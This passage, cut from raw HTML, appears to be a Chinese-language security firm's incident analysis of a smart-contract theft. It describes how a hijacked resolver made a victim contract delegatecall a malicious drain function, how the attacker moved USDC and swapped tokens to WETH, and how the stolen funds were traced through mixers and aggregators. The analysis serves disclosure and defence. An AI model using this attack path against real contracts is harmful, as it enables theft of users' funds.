serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">drain(USDC, 0xeed236...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。该函数不在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouter</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 原生 ABI 中，进入 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">fallback()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。被劫持的 resolver 返回恶意 drain 实现 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x0b971e0...</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，受害合约对其 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">delegatecall</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。恶意代码查询 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">USDC.balanceOf(0x5c59...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 得到 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">132704591501</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（即 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">132,704.591501 USDC</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">），随后调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">USDC.transfer()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 直接转入攻击者 EOA。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约再次调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">drain(0xf929..., 0x835a701f...)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，依相同路径将被盗中间代币 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">841086343608217839604694</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 单位转入攻击合约。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击合约通过 Router </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x4752ba5dbc23f44d87826276bf6fd6b1c372ad24</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 将被盗中间代币在 Pair </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x5f6ce0ca...</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中 swap 为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.949506469643782660 WETH</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，WETH 直接转入攻击者 EOA。</span></span></p></li></ol></b></p><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">获利闭合</span></span></h3><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">资产</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">金额</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">流向</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">USDC</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">132,704.591501</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">受害合约 → 攻击者 EOA</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">WETH</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.9495</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">中间代币 swap → 攻击者 EOA</span></span></p></td></tr></tbody></table><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">资金追踪</span></span></h2><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">通过慢雾 MistTrack 对攻击者 EOA </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0xeed236afb6967f74099a0a6bf078bc6b865fbf28</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 进行地址画像与交易对手分析：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Gas 来源</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：攻击者的初始 Gas 由 TornadoCash 提供（地址 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x12d66f87a04a9e220743712ce6d9bb1b5616b8fc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> ）。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意标签</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：MistTrack 已标记该地址为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ShapeShift Exploiter</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主要痕迹</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Relay.link</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> — $4,368.08，DEX 聚合器，用于资产兑换。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Tornado.Cash</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> — $218.09，从混币器提取初始 Gas。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">LI.FI</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> — $137,073.66，跨链/DEX 聚合器。</span></span></p></li></ul></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者盗取的资金流入了Spark.fi Saving，且存在 Tornado.Cash 交互记录，增加了后续追踪的难度。慢雾 MistTrack 将持续监控相关地址的资金动向。</span></span></p></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3803986710963455" data-type="png" data-w="602" height="229" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021295" src="https://wechat2rss.xlab.app/img-proxy/?k=8b00a5c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKYLibzteicBXDUBQ5Z9YibTyAGvvxq1HX6tMnhJhGzTdTcW1aKfZaV385ibjZxlicyNZO115CRT9SL0xG8DOOp2qIVlGic5l9DyTZHM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;margin-top: 24px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">总结</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: 